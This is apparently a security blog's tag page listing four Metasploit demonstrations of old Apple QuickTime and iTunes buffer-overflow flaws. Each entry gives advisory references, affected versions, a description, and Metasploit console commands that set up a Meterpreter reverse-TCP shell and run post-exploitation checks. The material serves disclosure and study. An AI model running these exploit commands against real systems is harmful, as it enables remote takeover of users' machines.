aka wow on ZATAZ.com
Posts tagged QuickTime
CVE-2012-3752 Apple QuickTime TeXML Vulnerability Metasploit Demo
36 months ago
in Exploits, Metasploit
Timeline :
Vulnerability reported to vendor by Arezou Hosseinzad-Amirkhizi
Coordinate public release of the vulnerability the 2012-11-05
Metasploit PoC provided by juan vazquez the 2012-11-22
PoC provided by :
Arezou Hosseinzad-Amirkhizi
juan vazquez
Reference(s) :
CVE-2012-3752
OSVDB-87087
BID-56557
HT5581
Affected version(s) :
QuickTime 7.7.2 and earlier for Windows
Tested on Windows XP Pro SP3 with :
QuickTime 7.7.2
Firefox 3.5.1
Description :
This module exploits a vulnerability found in Apple QuickTime. When handling a TeXML file, it is possible to trigger a stack-based buffer overflow, and then gain arbitrary code execution under the context of the user. This is due to the QuickTime3GPP.gtx component not handling certain Style subfields properly, as the font-table field, which is used to trigger the overflow in this module. Because of QuickTime restrictions when handling font-table fields, only 0×31-0×39 bytes can be used to overflow, so at the moment DEP/ASLR bypass hasn’t been provided. The module has been tested successfully on IE6 and IE7 browsers (Windows XP and Vista).
Commands :
use exploit/windows/browser/apple_quicktime_texml_font_table set SRVHOST 192.168.178.26 set TARGET 3 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.26 exploit sessions -i 1 getuid sysinfo
CVE-2012-0663 Apple QuickTime TeXML BoF Vulnerability Metasploit Demo
011 months ago
in Exploits, Metasploit
Timeline :
Vulnerability discovered by Alexander Gavrun
Vulnerability reported to ZDI by Alexander Gavrun
Vulnerability reported by ZDI to the vendor the 2011-10-21
Coordinate public release of the vulnerability the 2012-06-12
Metasploit PoC provided the 2012-06-27
PoC provided by :
Alexander Gavrun
sinn3r
juan vazquez
Reference(s) :
CVE-2012-0663
OSVDB-81934
BID-53571
ZDI-12-107
HT1222
Affected version(s) :
QuickTime version 7.7.1 and previous
Tested on Windows XP Pro SP3 with :
QuickTime 7.7.1
Description :
This module exploits a vulnerability found in Apple QuickTime. When handling a TeXML file, it is possible to trigger a stack-based buffer overflow, and then gain arbitrary code execution under the context of the user. This is due to the QuickTime3GPP.gtx component not handling certain Style subfields properly, storing user-supplied data on the stack, which results the overflow.
Commands :
use exploit/windows/fileformat/apple_quicktime_texml set TARGET 0 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.100 exploit use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.100 exploit -j sysinfo getuid
Apple iTunes 10 Extended M3U Stack Buffer Overflow Vulnerability Metasploit Demo
012 months ago
in Exploits, Metasploit
Timeline :
Vulnerability fixed, without notice of the vulnerability, in product the 2012-06-11
Vulnerability discovered by Rh0
Public release of the vulnerability the 2012-06-20
Metasploit PoC provided the 2012-06-20
PoC provided by :
Rh0
sinn3r
Reference(s) :
EDB-ID-19322
HT5318
OSVDB-83220
Rh0
Affected version(s) :
iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.69 on XP SP3
iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.70 on XP SP3
iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.71 on XP SP3
iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.72 on XP SP3
Tested on Windows XP Pro SP3 with :
Apple iTunes 10.6.1.7
Apple QuickTime 7.72.80.56
Description :
This module exploits a stack buffer overflow in iTunes 10.4.0.80 to 10.6.1.7. When opening an extended .m3u file containing an “#EXTINF:” tag description, iTunes will copy the content after “#EXTINF:” without appropriate checking from a heap buffer to a stack buffer, writing beyond the stack buffer’s boundary, which allows code execution under the context of the user. Please note before using this exploit, you must have precise knowledge of the victim machine’s QuickTime version (if installed), and then select your target accordingly. In addition, even though this exploit can be used as remote, you should be aware the victim’s browser behavior when opening an itms link. For example, IE/Firefox/Opera by default will ask the user for permission before launching the itms link by iTunes. Chrome will ask for permission, but also spits a warning. Safari would be an ideal target, because it will open the link without any user interaction.
Commands :
use exploit/windows/misc/itunes_extm3u_bof set SRVHOST 192.168.178.100 set TARGET 3 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.100 exploit sysinfo getuid
CVE-2011-0257 : Apple QuickTime PICT PnSize Buffer Overflow Metasploit demo
01 year ago
in Exploits, Metasploit
Timeline :
Vulnerability discovered by Matt “j00ru” Jurczyk and submitted to ZDI
Vulnerability reported to vendor by ZDI the 2011-04-11
Coordinated public release of the vulnerability the 2011-08-08
Metasploit PoC provided the 2011-09-03
PoC provided by :
MC
Reference(s) :
Affected version(s) :
All Apple QuickTime Player previous to version 7.7
Tested on Windows XP SP3 with :
Apple QuickTime Player 7.6 (472)
Description :
This module exploits a vulnerability in Apple QuickTime Player 7.60.92.0. When opening a .mov file containing a specially crafted PnSize value, an attacker may be able to execute arbitrary code.
Commands :
use exploit/windows/fileformat/apple_quicktime_pnsize
set FILENAME hollidays.mov
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploituse exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -jgetuid
sysinfo
Recent Comments